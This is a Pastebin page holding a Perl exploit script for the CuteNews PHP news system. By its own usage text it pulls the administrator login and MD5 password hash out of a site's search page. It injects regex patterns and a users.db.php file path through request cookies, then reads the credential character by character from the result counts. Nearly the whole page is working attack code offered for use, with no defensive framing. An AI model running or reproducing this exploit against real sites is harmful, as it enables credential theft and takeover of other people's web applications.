Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- &usage unless $ARGV[0];
- use strict;
- use LWP;
- use utf8;
- use Encode qw( decode );
- $| = 1;
- # main
- my $search_page_url = URI->new($ARGV[0]);
- my $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36'; # common user agent string
- my ($login, $md5hash);
- $search_page_url->query_form([ 'dosearch' => 'yes',
- 'user' => '1',
- ]
- );
- # try the 'admin' login
- print STDERR "[Getting login]\n";
- {
- print STDERR "Checking if there exists account named 'admin'... ";
- if (&login('^admin$')){
- $login = 'admin';
- print STDERR 'yes!';
- } else {
- print STDERR 'no.';
- };
- print STDERR "\n";
- }
- # bruteforce [a-zA-Z0-9] login if not 'admin'
- unless ($login){
- print STDERR 'Finding login... ';
- my $tmp = '';
- # check if login length is in 1-64
- die "\n", 'Can\'t find suitable account.' unless &login('^[a-zA-Z0-9]{1,64}$');
- until( &login("\^${tmp}\$")) {
- $tmp .= &binary_search($tmp, 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', \&login);
- print STDERR "\rFinding login... $tmp";
- }
- print STDERR "\n";
- $login = $tmp;
- }
- die '...' unless $login;
- # bruteforce md5 hash
- print STDERR "\n[Getting password hash]\n";
- {
- my $tmp = '';
- while( length($tmp) != 32) {
- $tmp .= &binary_search($tmp, 'abcdef0123456789', \&password);
- print STDERR "\r$tmp";
- }
- print STDERR "\n";
- $md5hash = $tmp;
- }
- die "..." unless $md5hash;
- print STDERR "\n[Output]\n";
- print "$login:$md5hash\n";
- exit;
- # can be upgraded to turn strings like abcdef into [a-f]
- sub binary_search{
- my ($part, $symbols, $req) = @_;
- print STDERR substr($symbols, int(length($symbols)/2), 1);
- while (length($symbols) != 1){
- my $tmp = substr($symbols, 0, int(length($symbols)/2));
- if ($req->("^${part}[$tmp]")){
- $symbols = $tmp;
- } else {
- $symbols = substr($symbols, int(length($symbols)/2));
- }
- print STDERR "\b", substr($symbols, int(length($symbols)/2), 1);
- }
- return $symbols;
- }
- sub password{ # apply regex from $_[0] to $login's md5-hash and parse response
- my $url = $search_page_url->clone;
- $url->query_form( ($url->query_form,
- 'files_arch[]' => 'data/users.db.php',
- 'title' => $login,
- 'story' => "(?=^[a-z0-9]{32}\$)$_[0]", # (?=..) to match only vs hash, not nickname. check app source code
- #if(@preg_match("/$story/i", *nickname*) or @preg_match("/$story/i", *hash*)
- )
- );
- my $response = &do_REQ($url);
- return &parse_response($response);
- }
- sub login{ # apply regex from $_[0] to login and parse response
- my $url = $search_page_url->clone;
- $url->query_form( ($url->query_form,
- 'files_arch[]' => 'data/users.db.php',
- 'title' => $_[0],
- )
- );
- my $response = &do_REQ($url);
- return &parse_response($response);
- }
- sub usage{
- print STDERR ' _ _ _______ ______
- ___| \ | | ____\ \ / / ___|
- / __| \| | _| \ \ /\ / /\___ \
- | (__| |\ | |___ \ V V / ___) |
- \___|_| \_|_____| \_/\_/ |____/
- ___ ____ __
- / _ \___ \ / /_
- | | | |__) | \'_ \
- | |_| / __/| (_) |
- \___/_____|\___/
- This program exploits vulnerability in CuteNews php script and gives you administrator login and md5-hashed password.
- Note: you can redirect stdout to file to get credentials in form login:hash. Stderr will be used for status updates.
- Example of usage:
- perl ', $0, ' http://rdot.org/cnews/search.php >creds.txt';
- exit;
- }
- sub parse_response{
- my $response = decode('cp1251', $_[0]);
- die "Can't parse response!" unless $response =~ m{Найдено <b>\[(\d+)\]</b> статей:};
- return $1;
- }
- my $browser;
- sub do_REQ {
- unless ($browser){
- $browser = LWP::UserAgent->new(('agent' => $user_agent));
- $browser->timeout(30);
- }
- # since rg==on always, turn all GET params 2 COOKIE
- my $url = URI->new($_[0]);
- my $params = $url->query();
- $params =~ s/&/; /g;
- $url->query_form('');
- my $resp = $browser->get($url, ('Cookie' => $params));
- die "Failed making request" unless $resp->is_success;
- return ($resp->content, $resp->status_line, $resp->is_success)
- if wantarray;
- return unless $resp->is_success;
- return $resp->content;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement